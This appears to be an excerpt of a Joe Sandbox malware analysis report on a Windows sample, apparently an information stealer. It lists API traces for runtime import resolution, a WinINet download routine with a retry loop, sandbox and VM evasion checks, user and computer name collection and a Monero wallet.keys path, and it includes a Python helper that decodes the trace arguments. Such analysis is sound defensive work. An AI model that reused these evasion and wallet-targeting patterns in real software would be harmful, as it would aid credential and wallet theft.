                              • GetProcAddress.KERNEL32(75A10000,009A5108), ref: 00BFA3CB
                              • GetProcAddress.KERNEL32(75A10000,009A5348), ref: 00BFA3E4
                              • GetProcAddress.KERNEL32(75A10000,009BD2D8), ref: 00BFA3FC
                              • GetProcAddress.KERNEL32(75A10000,009BD1A0), ref: 00BFA414
                              • GetProcAddress.KERNEL32(76850000,009A51C8), ref: 00BFA436
                              • GetProcAddress.KERNEL32(76850000,009BD278), ref: 00BFA44E
                              • GetProcAddress.KERNEL32(76850000,009BD2C0), ref: 00BFA466
                              • GetProcAddress.KERNEL32(76850000,009BD2F0), ref: 00BFA47F
                              • GetProcAddress.KERNEL32(76850000,009BD308), ref: 00BFA497
                              • GetProcAddress.KERNEL32(75690000,009A5088), ref: 00BFA4B8
                              • GetProcAddress.KERNEL32(75690000,009A50C8), ref: 00BFA4D1
                              • GetProcAddress.KERNEL32(769C0000,009A5228), ref: 00BFA4F2
                              • GetProcAddress.KERNEL32(769C0000,009BD1B8), ref: 00BFA50A
                              • GetProcAddress.KERNEL32(6F8C0000,009A5288), ref: 00BFA530
                              • GetProcAddress.KERNEL32(6F8C0000,009A5128), ref: 00BFA548
                              • GetProcAddress.KERNEL32(6F8C0000,009A52A8), ref: 00BFA560
                              • GetProcAddress.KERNEL32(6F8C0000,009BD3E0), ref: 00BFA579
                              • GetProcAddress.KERNEL32(6F8C0000,009A4FC8), ref: 00BFA591
                              • GetProcAddress.KERNEL32(6F8C0000,009A52E8), ref: 00BFA5A9
                              • GetProcAddress.KERNEL32(6F8C0000,009A5248), ref: 00BFA5C2
                              • GetProcAddress.KERNEL32(6F8C0000,009A51A8), ref: 00BFA5DA
                              • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00BFA5F1
                              • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00BFA607
                              • GetProcAddress.KERNEL32(75D90000,009BD3F8), ref: 00BFA629
                              • GetProcAddress.KERNEL32(75D90000,009B8B08), ref: 00BFA641
                              • GetProcAddress.KERNEL32(75D90000,009BD380), ref: 00BFA659
                              • GetProcAddress.KERNEL32(75D90000,009BD368), ref: 00BFA672
                              • GetProcAddress.KERNEL32(76470000,009A5148), ref: 00BFA693
                              • GetProcAddress.KERNEL32(70220000,009BD398), ref: 00BFA6B4
                              • GetProcAddress.KERNEL32(70220000,009A52C8), ref: 00BFA6CD
                              • GetProcAddress.KERNEL32(70220000,009BD410), ref: 00BFA6E5
                              • GetProcAddress.KERNEL32(70220000,009BD3B0), ref: 00BFA6FD
                              Strings
Memory Dump Source
• Same source file (00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true) and the same associated dumps as the entry above.
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: c106ee7e8803ea820bd5af3d21aeee13d17223c410d911eaf43bbe51e3424a19
                              • Instruction ID: b45e5102ab6990b658e48f7ed790638235ff5e16168c70f684936f897e69e365
                              • Opcode Fuzzy Hash: c106ee7e8803ea820bd5af3d21aeee13d17223c410d911eaf43bbe51e3424a19
                              • Instruction Fuzzy Hash: 13620FB5500200AFC368DFAAEE8896637F9F74C70171C853BE60AE3264D739944BDB56

Control-flow Graph (basic block id, address range, calls made in the block; "->" lists successor blocks)

• 1033 be6280-be630b call bfa7a0, call be47b0, call bfa740, InternetOpenA, StrCmpCA -> 1040, 1041
• 1040 be630d -> 1041
• 1041 be6314-be6318 -> 1042, 1043
• 1042 be631e-be6342 InternetConnectA -> 1044, 1045
• 1043 be6509-be6525 call bfa7a0, call bfa800 * 2 -> 1061
• 1044 be64ff-be6503 InternetCloseHandle -> 1043
• 1045 be6348-be634c -> 1047, 1048
• 1047 be634e-be6358 -> 1050
• 1048 be635a -> 1050
• 1050 be6364-be6392 HttpOpenRequestA -> 1052, 1053
• 1052 be6398-be639c -> 1056, 1057
• 1053 be64f5-be64f9 InternetCloseHandle -> 1044
• 1056 be639e-be63bf InternetSetOptionA -> 1057
• 1057 be63c5-be6405 HttpSendRequestA, HttpQueryInfoA -> 1059, 1060
• 1059 be642c-be644b call bf8940 -> 1066, 1067
• 1060 be6407-be6427 call bfa740, call bfa800 * 2 -> 1061
• 1061 be6528-be652d (function exit)
• 1066 be644d-be6454 -> 1070, 1071
• 1067 be64c9-be64e9 call bfa740, call bfa800 * 2 -> 1061
• 1070 be6456-be6480 InternetReadFile -> 1076, 1077
• 1071 be64c7-be64ef InternetCloseHandle -> 1053
• 1076 be648b -> 1071
• 1077 be6482-be6489 -> 1076, 1080
• 1080 be648d-be64c5 call bfa9b0, call bfa8a0, call bfa800 -> 1070
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
                                • Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • InternetOpenA.WININET(00C00DFE,00000001,00000000,00000000,00000000), ref: 00BE62E1
                              • StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,009BEC40,00000000,00000000,00400100,00000000), ref: 00BE6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BE63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BE63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BE63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BE646D
                              • InternetCloseHandle.WININET(00000000), ref: 00BE64EF
                              • InternetCloseHandle.WININET(00000000), ref: 00BE64F9
                              • InternetCloseHandle.WININET(00000000), ref: 00BE6503
                              Strings
Memory Dump Source
• Same source file (00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true) and the same associated dumps as the entry above.
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 25e97103d7bba24f0aec7038cbebe8aa177eff6267a8b68671eeaf53a46b7024
                              • Instruction ID: c359e3c36ebb0ec669479e648d05a661188dcf3554032e932eff5fc67187f769
                              • Opcode Fuzzy Hash: 25e97103d7bba24f0aec7038cbebe8aa177eff6267a8b68671eeaf53a46b7024
                              • Instruction Fuzzy Hash: FB715E71A00258AFDB24DB95CC49FEEB7B8FB54700F1081A9F6096B1D0DBB46A89CF51
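The two entries above are easier to read once their raw arguments are decoded: the routine at 00BF9C10 resolves over a hundred imports through LoadLibraryA/GetProcAddress, and for almost all of them the tracer printed the name argument as a pointer (009A5xxx/009BDxxx) rather than as text, while the routine at 00BE6280 calls WinINet with numeric flags and option codes. The helper below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the report's `Api.MODULE(args), ref: addr` format, counts per module handle how many GetProcAddress names were pointer-only versus in the clear, and maps the WinINet numbers to the names from the public wininet.h header. The embedded trace lines are copied from the two entries above (a constructed subset); treating a pointer-only name as a string built at runtime is an inference, not something the trace states.

```python
import re
from collections import defaultdict

# Constructed sample: trace lines copied from the two entries above (the import
# resolver at 00BF9C10 and the WinINet fetch routine at 00BE6280).
SAMPLE_TRACE = """\
• GetProcAddress.KERNEL32(77190000,009A5548), ref: 00BF9C2D
• GetProcAddress.KERNEL32(77190000,009A5388), ref: 00BF9C45
• LoadLibraryA.KERNEL32(009BD0C8,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA03D
• GetProcAddress.KERNEL32(6F8C0000,009A5288), ref: 00BFA530
• GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00BFA5F1
• GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00BFA607
• InternetOpenA.WININET(00C00DFE,00000001,00000000,00000000,00000000), ref: 00BE62E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE6335
• HttpOpenRequestA.WININET(00000000,GET,?,009BEC40,00000000,00000000,00400100,00000000), ref: 00BE6385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BE63BF
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BE63FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BE646D
"""

# Names and values from the public wininet.h (only a useful subset).
INTERNET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                  0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
                  0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
                  0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
                  0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
                  0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
INTERNET_OPTIONS = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT",
                    6: "INTERNET_OPTION_RECEIVE_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE", 20: "HTTP_QUERY_STATUS_TEXT"}
SERVICES = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
OPEN_TYPES = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}

LINE_RE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")  # how the tracer prints a raw 32-bit argument


def parse_trace(text):
    """Turn 'Api.MODULE(arg,arg,...), ref: addr' lines into dicts; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            api, module, args, ref = m.groups()
            calls.append({"api": api, "module": module, "ref": int(ref, 16),
                          "args": [a.strip() for a in args.split(",")] if args else []})
    return calls


def decode_flags(value, table):
    """Name every bit of value found in table; bits not in the table are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append("0x%08X" % unknown)
    return names


def summarize_resolution(calls):
    """Per module handle: GetProcAddress names printed as a pointer vs. names in the clear."""
    per_module = defaultdict(lambda: {"clear": [], "pointer_only": 0})
    for c in calls:
        if c["api"] == "GetProcAddress" and len(c["args"]) >= 2:
            hmod, name = c["args"][0], c["args"][1]
            if HEX8_RE.match(name):          # tracer saw no readable string, only an address
                per_module[hmod]["pointer_only"] += 1
            else:
                per_module[hmod]["clear"].append(name)
    return dict(per_module)


def describe_call(call):
    """Decode the numeric WinINet arguments the trace shows into wininet.h names."""
    api, args = call["api"], call["args"]

    def num(i):  # argument i as an int when it is an 8-digit hex literal, else None
        return int(args[i], 16) if i < len(args) and HEX8_RE.match(args[i]) else None

    out = {}
    if api == "InternetOpenA" and num(1) is not None:
        out["dwAccessType"] = OPEN_TYPES.get(num(1), hex(num(1)))
    elif api == "InternetConnectA" and num(5) is not None:
        out["dwService"] = SERVICES.get(num(5), hex(num(5)))
    elif api == "HttpOpenRequestA" and len(args) > 6:
        out["lpszVerb"] = args[1]
        if num(6) is not None:
            out["dwFlags"] = decode_flags(num(6), INTERNET_FLAGS)
    elif api == "InternetSetOptionA" and num(1) is not None:
        out["dwOption"] = INTERNET_OPTIONS.get(num(1), hex(num(1)))
        out["dwBufferLength"] = num(3)  # the option value itself is behind '?', not in the trace
    elif api == "HttpQueryInfoA" and num(1) is not None:
        out["dwInfoLevel"] = HTTP_QUERY.get(num(1), hex(num(1)))
    elif api == "InternetReadFile" and num(2) is not None:
        out["dwNumberOfBytesToRead"] = num(2)
    return out


def analyse(text):
    calls = parse_trace(text)
    return {"resolution": summarize_resolution(calls),
            "wininet": [(c["api"], c["ref"], describe_call(c)) for c in calls
                        if c["module"] == "WININET"]}


if __name__ == "__main__":
    print(analyse(SAMPLE_TRACE))
```

On the sample this reports that module 6F8C0000 (the one queried for InternetSetOptionA and HttpQueryInfoA) also had a pointer-only lookup, that HttpOpenRequestA's 0x00400100 is INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, that InternetSetOptionA sets INTERNET_OPTION_SECURITY_FLAGS with a 4-byte value the trace does not show (so whether certificate errors are ignored cannot be read from this line alone), that HttpQueryInfoA asks for HTTP_QUERY_STATUS_CODE, and that the body is read in 0x7CF (1999) byte chunks. Run it against the full API list of an entry by pasting the lines into SAMPLE_TRACE.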

Control-flow Graph (basic block id, address range, calls made in the block; "->" lists successor blocks)

• 1090 bf5510-bf5577 call bf5ad0, call bfa820 * 3, call bfa740 * 4 -> 1106
• 1106 bf557c-bf5583 -> 1107, 1108
• 1107 bf55d7-bf564c call bfa740 * 2, call be1590, call bf52c0, call bfa8a0, call bfa800, call bfaad0, StrCmpCA -> 1134, 1137
• 1108 bf5585-bf55b6 call bfa820, call bfa7a0, call be1590, call bf51f0 -> 1124
• 1124 bf55bb-bf55d2 call bfa8a0, call bfa800 -> 1134
• 1134 bf5693-bf56a9 call bfaad0, StrCmpCA -> 1140, 1141
• 1137 bf564e-bf568e call bfa7a0, call be1590, call bf51f0, call bfa8a0, call bfa800 -> 1134
• 1140 bf56af-bf56b6 -> 1142, 1143
• 1141 bf57dc-bf5844 call bfa8a0, call bfa820 * 2, call be1670, call bfa800 * 4, call bf6560, call be1550 -> 1272
• 1142 bf56bc-bf56c3 -> 1146, 1147
• 1143 bf57da-bf585f call bfaad0, StrCmpCA -> 1161, 1162
• 1146 bf571e-bf5793 call bfa740 * 2, call be1590, call bf52c0, call bfa8a0, call bfa800, call bfaad0, StrCmpCA -> 1143, 1250
• 1147 bf56c5-bf5719 call bfa820, call bfa7a0, call be1590, call bf51f0, call bfa8a0, call bfa800 -> 1143
• 1161 bf5865-bf586c -> 1167, 1168
• 1162 bf5991-bf59f9 call bfa8a0, call bfa820 * 2, call be1670, call bfa800 * 4, call bf6560, call be1550 -> 1272
• 1167 bf598f-bf5a14 call bfaad0, StrCmpCA -> 1197, 1198
• 1168 bf5872-bf5879 -> 1174, 1175
• 1174 bf587b-bf58ce call bfa820, call bfa7a0, call be1590, call bf51f0, call bfa8a0, call bfa800 -> 1167
• 1175 bf58d3-bf5948 call bfa740 * 2, call be1590, call bf52c0, call bfa8a0, call bfa800, call bfaad0, StrCmpCA -> 1167, 1276
• 1197 bf5a28-bf5a91 call bfa8a0, call bfa820 * 2, call be1670, call bfa800 * 4, call bf6560, call be1550 -> 1272
• 1198 bf5a16-bf5a21 Sleep -> 1106 (back edge: retry loop)
• 1250 bf5795-bf57d5 call bfa7a0, call be1590, call bf51f0, call bfa8a0, call bfa800 -> 1143
• 1272 bf5ac3-bf5ac6 (function exit)
• 1276 bf594a-bf598a call bfa7a0, call be1590, call bf51f0, call bfa8a0, call bfa800 -> 1167
                              APIs
                                • Part of subcall function 00BFA820: lstrlen.KERNEL32(00BE4F05,?,?,00BE4F05,00C00DDE), ref: 00BFA82B
                                • Part of subcall function 00BFA820: lstrcpy.KERNEL32(00C00DDE,00000000), ref: 00BFA885
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5857
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5228
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5318
                                • Part of subcall function 00BF52C0: lstrlen.KERNEL32(00000000), ref: 00BF532F
                                • Part of subcall function 00BF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00BF5364
                                • Part of subcall function 00BF52C0: lstrlen.KERNEL32(00000000), ref: 00BF5383
                                • Part of subcall function 00BF52C0: lstrlen.KERNEL32(00000000), ref: 00BF53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00BF5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 2057d934e69efbeb110564f36c51ee843d611dae79b843a1c9a4dcaa7e921311
                              • Instruction ID: 3830a8e1482224399f7f252538ea49926ea7e19a147ba09c054ca90ec0da8f5e
                              • Opcode Fuzzy Hash: 2057d934e69efbeb110564f36c51ee843d611dae79b843a1c9a4dcaa7e921311
                              • Instruction Fuzzy Hash: D0E122B191010C9BCB18FBA4DC56EFD73B8AF54340F5485A8B60A67095EF746E0ECB92

                              Control-flow Graph
                              (graph rendering not reproduced; legend: Executed / Not Executed)
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00BF17C5
                              • ExitProcess.KERNEL32 ref: 00BF17D1
                              Strings
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 24fc569659c759c5d399c9a2bf8b2ccf58a930cbe3812c3009ec5c2103a98a72
                              • Instruction ID: dfa26d01bae16557b9273b1194ee2ce6edf3af3841b7593573f7b6fb69a06e03
                              • Opcode Fuzzy Hash: 24fc569659c759c5d399c9a2bf8b2ccf58a930cbe3812c3009ec5c2103a98a72
                              • Instruction Fuzzy Hash: 18514FB4A0020DEFCB18DFA5D994BBE77F5BF44704F108898E60567240D7B0E95ADB62

                              Control-flow Graph
                              (graph rendering not reproduced; legend: Executed / Not Executed)
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BF7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF760A
                              • wsprintfA.USER32 ref: 00BF7640
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: b8adab5b68116087eaf6587660988c8c6ed52607fe0f955953c74ffe41b3df93
                              • Instruction ID: e76ca349ad980de244a458d865efbb0dfbd3839e69ad0941f9815c52099c8123
                              • Opcode Fuzzy Hash: b8adab5b68116087eaf6587660988c8c6ed52607fe0f955953c74ffe41b3df93
                              • Instruction Fuzzy Hash: F04182B194424CABDF10DB94DC85BEEB7B8EF18700F1400E9F609A7280DB746A48CBA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B15E8), ref: 00BF98A1
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B16F0), ref: 00BF98BA
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B1738), ref: 00BF98D2
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B1588), ref: 00BF98EA
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B16A8), ref: 00BF9903
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B8B38), ref: 00BF991B
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009A55E8), ref: 00BF9933
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009A53A8), ref: 00BF994C
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B1510), ref: 00BF9964
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B14F8), ref: 00BF997C
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B1618), ref: 00BF9995
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B16C0), ref: 00BF99AD
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009A5408), ref: 00BF99C5
                                • Part of subcall function 00BF9860: GetProcAddress.KERNEL32(77190000,009B1630), ref: 00BF99DE
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BE11D0: ExitProcess.KERNEL32 ref: 00BE1211
                                • Part of subcall function 00BE1160: GetSystemInfo.KERNEL32(?), ref: 00BE116A
                                • Part of subcall function 00BE1160: ExitProcess.KERNEL32 ref: 00BE117E
                                • Part of subcall function 00BE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BE112B
                                • Part of subcall function 00BE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BE1132
                                • Part of subcall function 00BE1110: ExitProcess.KERNEL32 ref: 00BE1143
                                • Part of subcall function 00BE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BE123E
                                • Part of subcall function 00BE1220: ExitProcess.KERNEL32 ref: 00BE1294
                                • Part of subcall function 00BF6770: GetUserDefaultLangID.KERNEL32 ref: 00BF6774
                                • Part of subcall function 00BE1190: ExitProcess.KERNEL32 ref: 00BE11C6
                                • Part of subcall function 00BF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BE11B7), ref: 00BF7880
                                • Part of subcall function 00BF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7887
                                • Part of subcall function 00BF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BF789F
                                • Part of subcall function 00BF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7910
                                • Part of subcall function 00BF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7917
                                • Part of subcall function 00BF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BF792F
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009B8AD8,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BF6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00BF6AF9
                              • Sleep.KERNEL32(00001770), ref: 00BF6B04
                              • CloseHandle.KERNEL32(?,00000000,?,009B8AD8,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6B1A
                              • ExitProcess.KERNEL32 ref: 00BF6B22
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: b20eba3a73f77f7bff12d2f92c4531c3fdf9a76fab9cdb768da72ac69a77a7bf
                              • Instruction ID: 5c634964045ff3733a115de38f21d9b92eeff5a52e8578650272e9abb87419f7
                              • Opcode Fuzzy Hash: b20eba3a73f77f7bff12d2f92c4531c3fdf9a76fab9cdb768da72ac69a77a7bf
                              • Instruction Fuzzy Hash: FB31FE7190010CABDB08FBA5DC56BFE77B8AF04340F1445A8F706B7191DFB05A09C6A6

                              Control-flow Graph
                              (graph rendering not reproduced; legend: Executed / Not Executed)
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009B8AD8,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BF6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00BF6AF9
                              • Sleep.KERNEL32(00001770), ref: 00BF6B04
                              • CloseHandle.KERNEL32(?,00000000,?,009B8AD8,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6B1A
                              • ExitProcess.KERNEL32 ref: 00BF6B22
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 3c3951f322545e1641ce48d8d1055f6d0db2d6d61719c1aab4f443b7b85586af
                              • Instruction ID: c74bcd563735bdf080d5854ef0a6850e126d515724da60c761857ddf114d233d
                              • Opcode Fuzzy Hash: 3c3951f322545e1641ce48d8d1055f6d0db2d6d61719c1aab4f443b7b85586af
                              • Instruction Fuzzy Hash: 55F03A7094020DAFE720ABA09C4ABBD7BB4EB04701F1445A5BB02A3182CBB0554DD656

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849
                              Strings
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 0d340e99fd6236900a05f6c88afa455c1fcb9941a04a74914854c6aeb2e5d1ac
                              • Instruction ID: e3fb29f28f2ef521790ff41134d96bae26004e33093fd8cba90bd75e2f1d4257
                              • Opcode Fuzzy Hash: 0d340e99fd6236900a05f6c88afa455c1fcb9941a04a74914854c6aeb2e5d1ac
                              • Instruction Fuzzy Hash: C52130B1D00209ABDF14DF55E849ADE7B75FB44310F108625F615A7280EB706609DB81

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE6280: InternetOpenA.WININET(00C00DFE,00000001,00000000,00000000,00000000), ref: 00BE62E1
                                • Part of subcall function 00BE6280: StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE6303
                                • Part of subcall function 00BE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE6335
                                • Part of subcall function 00BE6280: HttpOpenRequestA.WININET(00000000,GET,?,009BEC40,00000000,00000000,00400100,00000000), ref: 00BE6385
